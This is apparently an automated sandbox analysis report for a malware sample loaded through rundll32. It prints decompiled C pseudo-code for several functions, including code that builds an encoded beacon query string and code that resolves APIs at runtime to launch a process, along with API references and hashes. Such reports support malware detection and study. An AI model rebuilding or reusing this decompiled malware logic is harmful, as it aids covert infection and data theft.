                                                  • Instruction Fuzzy Hash: 5061A87192020CAFC7299FA5EC8AFDA3FE8EF48214F050515F909D7260DF35E8169BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05478B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E05478B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x547d018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0x547d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x547d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x547d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x547d27c; // 0x1f6a5a8
				_t3 = _t64 + 0x547e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x547d02c,  *0x547d004, _t59);
				_t67 = E05471C1A();
				_t68 =  *0x547d27c; // 0x1f6a5a8
				_t4 = _t68 + 0x547e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71;
				_t72 = E054754BC(_t135);
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x547d27c; // 0x1f6a5a8
					_t7 = _t127 + 0x547e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x547d238, 0, _v8);
				}
				_t73 = E05477649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x547d27c; // 0x1f6a5a8
					_t11 = _t122 + 0x547e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x547d238, 0, _v8);
				}
				_t147 =  *0x547d32c; // 0x73e95b0
				_t75 = E05479395(0x547d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x547d238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x547d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x547d238, _t153, _v20);
						goto L26;
					}
					E05477A80(GetTickCount());
					_t82 =  *0x547d32c; // 0x73e95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x547d32c; // 0x73e95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x547d32c; // 0x73e95b0
					_t149 = E05478307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x547d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x547c2ac);
					_push(_t149);
					_t94 = E05473CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x547d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E0547809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E0547A1B0();
						L22:
						HeapFree( *0x547d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E054743DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E0547163F(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E05479039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E054785DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E05479039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                  0x05478b94
                                                  0x05478b94
                                                  0x05478b94
                                                  0x05478b9f
                                                  0x05478ba6
                                                  0x05478ba8
                                                  0x05478ba8
                                                  0x05478bb5
                                                  0x05478bc0
                                                  0x05478bc3
                                                  0x05478bc8
                                                  0x05478bd1
                                                  0x05478bd4
                                                  0x05478bd9
                                                  0x05478bdc
                                                  0x05478be1
                                                  0x05478be4
                                                  0x05478bf0
                                                  0x05478bfd
                                                  0x05478bff
                                                  0x05478c05
                                                  0x05478c0a
                                                  0x05478c15
                                                  0x05478c17
                                                  0x05478c1a
                                                  0x05478c1c
                                                  0x05478c23
                                                  0x05478c29
                                                  0x05478c2c
                                                  0x05478c2f
                                                  0x05478c34
                                                  0x05478c41
                                                  0x05478c43
                                                  0x05478c49
                                                  0x05478c53
                                                  0x05478c53
                                                  0x05478c55
                                                  0x05478c5c
                                                  0x05478c5f
                                                  0x05478c62
                                                  0x05478c67
                                                  0x05478c74
                                                  0x05478c76
                                                  0x05478c84
                                                  0x05478c84
                                                  0x05478c86
                                                  0x05478c94
                                                  0x05478c99
                                                  0x05478c9d
                                                  0x05478ca0
                                                  0x05478e63
                                                  0x05478e6d
                                                  0x05478e76
                                                  0x05478ca6
                                                  0x05478cb2
                                                  0x05478cba
                                                  0x05478cbd
                                                  0x05478e57
                                                  0x05478e61
                                                  0x00000000
                                                  0x05478e61
                                                  0x05478cc9
                                                  0x05478cce
                                                  0x05478cd7
                                                  0x05478ce8
                                                  0x05478cec
                                                  0x05478cf5
                                                  0x05478cfb
                                                  0x05478d0a
                                                  0x05478d11
                                                  0x05478d1a
                                                  0x05478d20
                                                  0x05478e4b
                                                  0x05478e55
                                                  0x00000000
                                                  0x05478e55
                                                  0x05478d2c
                                                  0x05478d32
                                                  0x05478d33
                                                  0x05478d3a
                                                  0x05478d3d
                                                  0x05478e41
                                                  0x05478e49
                                                  0x00000000
                                                  0x05478e49
                                                  0x05478d46
                                                  0x05478d4d
                                                  0x05478d55
                                                  0x05478d5a
                                                  0x05478d63
                                                  0x05478d69
                                                  0x05478d70
                                                  0x05478d77
                                                  0x05478d7a
                                                  0x05478e79
                                                  0x05478e2d
                                                  0x05478e2d
                                                  0x05478e32
                                                  0x05478e3d
                                                  0x05478e3f
                                                  0x00000000
                                                  0x05478e3f
                                                  0x05478d84
                                                  0x05478d8b
                                                  0x05478d8e
                                                  0x05478d93
                                                  0x05478da3
                                                  0x05478da6
                                                  0x05478dac
                                                  0x05478db2
                                                  0x05478db8
                                                  0x05478dbb
                                                  0x05478dc1
                                                  0x05478dc4
                                                  0x05478dc9
                                                  0x05478dcd
                                                  0x05478dcd
                                                  0x05478dd9
                                                  0x05478de5
                                                  0x05478de9
                                                  0x05478deb
                                                  0x05478df0
                                                  0x05478df2
                                                  0x05478df7
                                                  0x05478dfc
                                                  0x05478e09
                                                  0x05478e11
                                                  0x05478e14
                                                  0x05478e14
                                                  0x05478df0
                                                  0x00000000
                                                  0x05478ddb
                                                  0x05478ddf
                                                  0x05478e16
                                                  0x05478e19
                                                  0x05478e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x05478e22
                                                  0x05478de1
                                                  0x00000000
                                                  0x05478de1
                                                  0x05478dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 05478BA8
                                                  • wsprintfA.USER32 ref: 05478BF8
                                                  • wsprintfA.USER32 ref: 05478C15
                                                  • wsprintfA.USER32 ref: 05478C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478C53
                                                  • wsprintfA.USER32 ref: 05478C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05478CB2
                                                  • GetTickCount.KERNEL32 ref: 05478CC3
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 05478CD7
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 05478CF5
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05478307: strcpy.NTDLL ref: 05478351
                                                    • Part of subcall function 05478307: lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05478307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                  • StrTrimA.SHLWAPI(00000000,0547C2AC,?,073E95B0), ref: 05478D2C
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05473CC8: lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                    • Part of subcall function 05473CC8: lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 05478D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 05478D55
                                                  • lstrcat.KERNEL32(?,?), ref: 05478D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 05478D69
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                  • wcstombs.NTDLL ref: 05478DFC
                                                    • Part of subcall function 0547163F: SysAllocString.OLEAUT32(?), ref: 05471680
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 05478E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05478E49
                                                  • HeapFree.KERNEL32(00000000,?,?,073E95B0), ref: 05478E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478E6D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 4693e06ad813a859a6608b4652282cf17b6ca2eb37e442cf78dc1360ae73cd41
                                                  • Instruction ID: 6f7a1aa1e119994a597c0fd13155f4dbd2ba29f7b2ae230473c8e42e4ade6962
                                                  • Opcode Fuzzy Hash: 4693e06ad813a859a6608b4652282cf17b6ca2eb37e442cf78dc1360ae73cd41
                                                  • Instruction Fuzzy Hash: 4B913671A1020CAFCB15DFA9DC89AEE7FB9FF08250F144456F909E7260DB31A951DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E0547816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x547d33c; // 0x73e9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E054770F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x547c1ac;
				}
				_t46 = E05478022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E05472049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x547d27c; // 0x1f6a5a8
						_t16 = _t75 + 0x547eb28; // 0x530025
						 *0x547d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E054770F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x547c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E05472049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E05479039(_v20);
						} else {
							_t66 =  *0x547d27c; // 0x1f6a5a8
							_t31 = _t66 + 0x547ec48; // 0x73006d
							 *0x547d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E05479039(_v12);
				}
				return _v24;
			}




























                                                  0x05478174
                                                  0x0547817a
                                                  0x05478181
                                                  0x05478187
                                                  0x0547818b
                                                  0x0547818f
                                                  0x05478192
                                                  0x05478199
                                                  0x0547819c
                                                  0x0547819e
                                                  0x0547819e
                                                  0x054781a7
                                                  0x054781ae
                                                  0x054781b1
                                                  0x054781b7
                                                  0x054781c1
                                                  0x054781ca
                                                  0x054781d1
                                                  0x054781ea
                                                  0x054781f1
                                                  0x054781f4
                                                  0x054781fd
                                                  0x05478206
                                                  0x05478217
                                                  0x05478220
                                                  0x05478224
                                                  0x05478228
                                                  0x0547822f
                                                  0x05478232
                                                  0x05478234
                                                  0x05478234
                                                  0x0547823e
                                                  0x05478247
                                                  0x0547824e
                                                  0x05478266
                                                  0x0547826a
                                                  0x054782a7
                                                  0x0547826c
                                                  0x0547826f
                                                  0x05478277
                                                  0x05478288
                                                  0x05478294
                                                  0x0547829c
                                                  0x054782a0
                                                  0x054782a0
                                                  0x0547826a
                                                  0x054782af
                                                  0x054782b4
                                                  0x054782bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 05478181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 054781C1
                                                  • lstrlen.KERNEL32(00000000), ref: 054781CA
                                                  • lstrlen.KERNEL32(00000000), ref: 054781D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 054781DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 0547823E
                                                  • lstrlen.KERNEL32(?), ref: 05478247
                                                  • lstrlen.KERNEL32(?), ref: 0547824E
                                                  • lstrlenW.KERNEL32(?), ref: 05478255
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: ccae971451eb571b37ebc1692f31fb4b8c7397e20ccc89af9da909962ad8b50d
                                                  • Instruction ID: c6bd44ebb38a085d1c33e18dd476227d49a477edd32523530a8dfc9637ae118e
                                                  • Opcode Fuzzy Hash: ccae971451eb571b37ebc1692f31fb4b8c7397e20ccc89af9da909962ad8b50d
                                                  • Instruction Fuzzy Hash: B641387290011CEBCF15AFA5CC49ADEBFB5EF48314F054096ED04A7221DB369A11DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E0547205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0547692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0547A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x547d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x547d27c; // 0x1f6a5a8
					_t18 = _t47 + 0x547e3e6; // 0x73797325
					_t68 = E054795B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x547d27c; // 0x1f6a5a8
						_t19 = _t50 + 0x547e747; // 0x73e8cef
						_t20 = _t50 + 0x547e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E054784D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E054784D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x547d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E05479039(_t70);
				goto L12;
			}


















                                                  0x05472066
                                                  0x05472066
                                                  0x05472075
                                                  0x0547207e
                                                  0x05472081
                                                  0x0547218e
                                                  0x05472195
                                                  0x05472195
                                                  0x05472090
                                                  0x05472098
                                                  0x0547209d
                                                  0x054720a0
                                                  0x054720b5
                                                  0x054720bb
                                                  0x054720bc
                                                  0x054720bf
                                                  0x054720c5
                                                  0x054720c8
                                                  0x054720cd
                                                  0x054720d5
                                                  0x054720e1
                                                  0x054720e5
                                                  0x05472175
                                                  0x054720eb
                                                  0x054720eb
                                                  0x054720f0
                                                  0x054720f7
                                                  0x0547210b
                                                  0x0547210f
                                                  0x0547215e
                                                  0x05472111
                                                  0x05472112
                                                  0x05472119
                                                  0x05472132
                                                  0x05472134
                                                  0x05472138
                                                  0x0547213f
                                                  0x05472159
                                                  0x05472141
                                                  0x0547214a
                                                  0x0547214f
                                                  0x0547214f
                                                  0x0547213f
                                                  0x0547216d
                                                  0x0547216d
                                                  0x054720e5
                                                  0x0547217c
                                                  0x05472185
                                                  0x05472189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0547692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0547207A,?,00000001,?,?,00000000,00000000), ref: 05476951
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 05476973
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 05476989
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0547699F
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 054769B5
                                                    • Part of subcall function 0547692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 054769CB
                                                  • memset.NTDLL ref: 054720C8
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,054723E9,63699BCE,05471354,73797325), ref: 054795C2
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 054795DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,073E8CEF,73797325), ref: 054720FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 05472105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547216D
                                                    • Part of subcall function 054784D5: GetProcAddress.KERNEL32(36776F57,054721E5), ref: 054784F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 0547214A
                                                  • CloseHandle.KERNEL32(?), ref: 0547214F
                                                  • GetLastError.KERNEL32(00000001), ref: 05472153
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: f6c9b5e6bf20ce8aa2ddd0be33a1c2cbcac4eaf8347f9d051600eef7b531d861
                                                  • Instruction ID: e0ff736a6ea9e86786465e8eed433d3282fe5e71ea44fafaea716e9235499d96
                                                  • Opcode Fuzzy Hash: f6c9b5e6bf20ce8aa2ddd0be33a1c2cbcac4eaf8347f9d051600eef7b531d861
                                                  • Instruction Fuzzy Hash: C33118B690420CAFDB109FE5D889DDFBFBDFB08254F0044AAF605A7210DB749E458BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05478307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E05478307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x547d27c; // 0x1f6a5a8
				_t1 = _t9 + 0x547e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E05479401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E05472049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E05477225(_t34, _t41, _a8);
						E05479039(_t41);
						_t42 = E05478E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E05479039(_t36);
							_t36 = _t42;
						}
						_t43 = E0547788B(_t36, _t33);
						if(_t43 != 0) {
							E05479039(_t36);
							_t36 = _t43;
						}
					}
					E05479039(_t28);
				}
				return _t36;
			}














                                                  0x05478307
                                                  0x0547830a
                                                  0x0547830b
                                                  0x05478313
                                                  0x0547831a
                                                  0x05478321
                                                  0x05478325
                                                  0x0547832b
                                                  0x05478332
                                                  0x05478337
                                                  0x05478349
                                                  0x0547834d
                                                  0x05478351
                                                  0x05478357
                                                  0x0547835c
                                                  0x0547836c
                                                  0x0547836e
                                                  0x05478385
                                                  0x05478389
                                                  0x0547838c
                                                  0x05478391
                                                  0x05478391
                                                  0x0547839a
                                                  0x0547839e
                                                  0x054783a1
                                                  0x054783a6
                                                  0x054783a6
                                                  0x0547839e
                                                  0x054783a9
                                                  0x054783a9
                                                  0x054783b4

                                                  APIs
                                                    • Part of subcall function 05479401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,05478321,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?), ref: 05479468
                                                    • Part of subcall function 05479401: sprintf.NTDLL ref: 05479489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                  • lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • strcpy.NTDLL ref: 05478351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05477225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,0547836B,00000000,?,?,?,0547A428,?,073E95B0), ref: 0547723C
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                    • Part of subcall function 05478E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05478385,00000000,?,?,0547A428,?,073E95B0), ref: 05478E8C
                                                    • Part of subcall function 05478E82: _snprintf.NTDLL ref: 05478EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: 648d136d71c5ad1ed15413b51d2c1c97e7ea2816121dbcc8abe563cc7e030673
                                                  • Instruction ID: 0734a041b02254c6ecc799f1cff72ed4e5695e7c4f998ac9a2aef695fd716175
                                                  • Opcode Fuzzy Hash: 648d136d71c5ad1ed15413b51d2c1c97e7ea2816121dbcc8abe563cc7e030673
